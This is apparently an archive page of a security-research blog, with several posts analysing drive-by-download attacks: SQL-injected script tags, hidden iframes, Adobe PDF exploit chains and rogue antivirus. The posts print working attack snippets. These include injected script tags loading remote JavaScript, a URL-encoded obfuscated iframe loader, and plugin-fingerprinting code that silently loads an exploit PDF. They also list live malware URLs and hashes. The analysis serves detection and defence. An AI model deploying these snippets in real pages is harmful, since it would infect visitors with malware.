Archive for the 'IFRAME' Category

11
Jun

Robint.us SQLi Utilizing CVE-2010-1297 Exploit

By lithium Comments
Categories: Exploit, Hack, IFRAME, SQL Injection, SQLi, Video and Vulnerabilities

The crew behind the recent massive SQLi is currently exploiting  the latest CVE-2010-1297 vulnerability in its drive-by-download attacks.  Yesterday, I created a video demonstrating how Cloud Antivirus blocked the 0day exploit using the new behavioral blocking technology included in the free version.  Check that out here:

We recommend patching Adobe and then installing Cloud Antivirus to prevent any future 0day attacks.

Here are some logs of our most recent encounter:

Session traffic:

GET hxxp://2677.in/cnzz.html

200 OK (text/html)

GET hxxp://2677.in/ie.html

200 OK (text/html)

GET hxxp://s11.cnzz.com/stat.php?id=1990191&web_id=1990191

200 OK (text/html)

GET hxxp://2677.in/log.txt

200 OK (text/plain)

GET hxxp://2677.in/anhey.swf

200 OK (application/x-shockwave-flash)

GET hxxp://2677.in/anhey.swf

206 Partial Content (application/x-shockwave-flash)

GET

hxxp://zs13.cnzz.com/stat.htm?id=1990191&r=http%3A//www.generationdb.com/&lg

=en-us&ntime=0.14859300%201276289711&repeatip=0&rtime=0&cnzz_eid=82761217-12

76289711-http%3A//www.generationdb.com/&showp=800×600&st=1276292642&sin=http

%3A//www.generationdb.com/&res=0

200 OK (image/gif)

GET hxxp://2677.in/log.exe

200 OK (application/octet-stream)

Injection log:

< table width=”96%” border=”0″ align=”center” cellpadding=”0″

cellspacing=”0″  >

< tr  >

< td colspan=”2″  >   < img alt=”" src=”images/5×5.gif” width=”5″ height=”8″

/  >  < /td  >

< /tr  >

< tr  >

< td align=”center” class=”hoverbox”  >   < a href=”#”  >   < img

src=’upload/community/moresmall_37726110_lego.jpg< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" /  >  < img src=’upload/community/large_37726110_lego.jpg< script src=http://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" class=”preview” /  > < /a  >  < /td  >

< td width=”55%” valign=”top” class=”category”  >

< a href=”unregisteredcommunity.aspx?Com_id=’7′”

target=”_self”  >    We are all  < /a  >  … < br  /  >  Category: Groups,<

br /  >  Location: USA< script src=hxxp://2677.in/yahoo.js  >  < /script  > < /td  > < /tr  > < tr  > < td colspan=”2″  > —————————————–< /td  > < /tr  > < /table  > < /td  >

< /tr  >  < tr  >

< td  >

< table width=”96%” border=”0″ align=”center” cellpadding=”0″

cellspacing=”0″  >

< tr  >

< td colspan=”2″  >   < img alt=”" src=”images/5×5.gif” width=”5″ height=”8″

/  >  < /td  >

< /tr  >

< tr  >

< td align=”center” class=”hoverbox”  >   < a href=”#”  >   < img

src=’upload/community/moresmall_2065474113_IMG_4127.JPG< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" /  >  < img src=’upload/community/large_2065474113_IMG_4127.JPG< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" class=”preview” /  > < /a  >  < /td  >

< td width=”55%” valign=”top” class=”category”  >

< a href=”unregisteredcommunity.aspx?Com_id=’6′”

target=”_self”  >    Technosoft < /a  >  … < br  /  >  Category:

Business,< br /  >  Location: India< script src=hxxp://2677.in/yahoo.js  > < /script  >  < /td  > < /tr  > < tr  > < td colspan=”2″ class=”line”  > —————————————–< /td  > < /tr  > < /table  > < /td  >

< /tr  >

< /table  >

13
Oct

Internet Exploitation Adventure

By djpnuemo Comments
Categories: Database Update, IFRAME, Rogue Software and Vulnerabilities

This post shows the lengths people will go to in order install malware onto computers. We will show how visiting one website will take you on a journey to many websites that will check your computer for vulnerable software and if found, will install malware on your computer.

First, there is a list of the domains involved in the exploit adventure. Simply visiting hxxp://defendmycreditunion.org will start this process. Then hidden iframes are loaded with websites scanning your computer for vulnerabilities and if it can’t, redirect you somewhere else. These websites are still active so proceed at your own risk.

The links on this page DO NOT link to the infected website. They are anchored links further down the page to view the analysis easier. The links just below are listed in the approximate order in which they load would while exploiting the machine.

BE ADVISED: The actual domains may still be active. Proceed at your own risk!

Picture below shows visual map of how pages are loaded.

Continue reading ‘Internet Exploitation Adventure’

04
Oct

Another Adobe Acrobat Exploit (accwizm.exe)-VIDEO

By djpnuemo Comments
Categories: Database Update, IFRAME, Malicious Links, Malware, Video and Vulnerabilities

Once again, we have an Adobe exploit page injecting another piece of malware. This one is different than the one posted earlier and this one redirects through multiple pages logging each visitor. I was able to capture a video of the computer being exploited simply by visiting the page. As with the previous exploit, the binary installed is almost fully undetected except for a few heuristic catches. Look below for more information about this exploit and information about the binary. It can be downloaded from /pnuemo-malware/ in our repository.

BE ADVISED: All sites my be active. Proceed at your own risk.

The user will visit the following URL: hxxp://66.232.117.33/~catetc/tdsHAX/kotopoucykanety.php

This pages contains a simple hidden iframe that will load multiple pages logging each visitor how visits.

<iframe src=”http://megsrdomain.cn/tor/count.php?o=5″ width=1 height=1 style=”visibility: hidden”></iframe>

In the iframe we are redirected two times until we reach the exploit page.

hxxp://megsrdomain.cn/tor/count.php?o=5 -> hxxp://megsrdomain.cn/tor/count.php?o=2 -> hxxp://82.103.138.10/ls/?t=24

hxxp://82.103.138.10/ls/?t=24 is the page that exploits Adobe Acrobat and installs the malware. This page contains many, many pages of code and there is too much to post here. You can view or download a clean .txt of the page code for this exploit by clicking here.

accwizm.exe
Result: 8/36 (22.22%)
MD5: 2bee943c7b8e63d17a92b99087ba15a7
VirusTotal
Sunbelt Sandbox

Download Video

31
Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

By djpnuemo Comments
Categories: Database Update, IFRAME, MalSpam, Malicious Links, Malware, Rogue Software and Vulnerabilities

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included

<script language=”javascript”>document.write(unescape(‘%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E’));</script>

when deobfuscated…

<iframe src=”http://69.46.27.41/afxv/tpv/index.php” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

We can see the hidden iframe above and the page includes the following code…

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
re=/.d.{2}e.A.{2}o…..l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+’.'+res[2]+’.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,”");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write(‘<iframe width=1 height=1 src=”hxxp://69.46.27.41/afxv/tpv/gnu.pdf”></iframe>’);
}
}
</script>

Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

29
Aug

XP Antivirus 2008 IFRAME update

By lithium Comments
Categories: Database Update and IFRAME

While stepping through malicious domains I noticed that the “International Virus Research Lab” (IVRL) pages for XP Antivirus 2008 had changed hashes. I was looking at  hxxp://bestantivirus2009.com at the time and noticed the inclusion of an IFRAME pointing to hxxp://huytegygle.com/index.php.

iframe

I took a look at the IFRAME and found the following obfuscated javascript.

obfuscatedjscode

After attempting a few exploits the code eventually leads us to hxxp://huytegygle.com/bin/file.exe which has a low (7/36 and mostly heuristic) detection rate @ VirusTotal.  The file has been made available inside /lithium-malware/.

File: file.exe [ThreatExpert]
File size: 8192 bytes
MD5…: a2a6455a4da0192fb8efe85e98fd3dfa
SHA1..: a9a65198cf692a306be1e23c9e965549b7294b26
SHA256: 92255343407bf219f094bec01ac7750cf82869741d6fb5c27967624ce0e6bc80
SHA512: 2b9a1c7b33e80bdfc213be9d3dfbeb7491ede790045c5aec15ec55bd686c9787
d2b19420f8058286c286375db2bee84e55d101c42f99a03a92010691e0b8eeb9
PEiD..: -

SANDBOX

SANDBOX ANALYSIS PAGE




 

September 2010
M T W T F S S
« Aug    
 12345
6789101112
13141516171819
20212223242526
27282930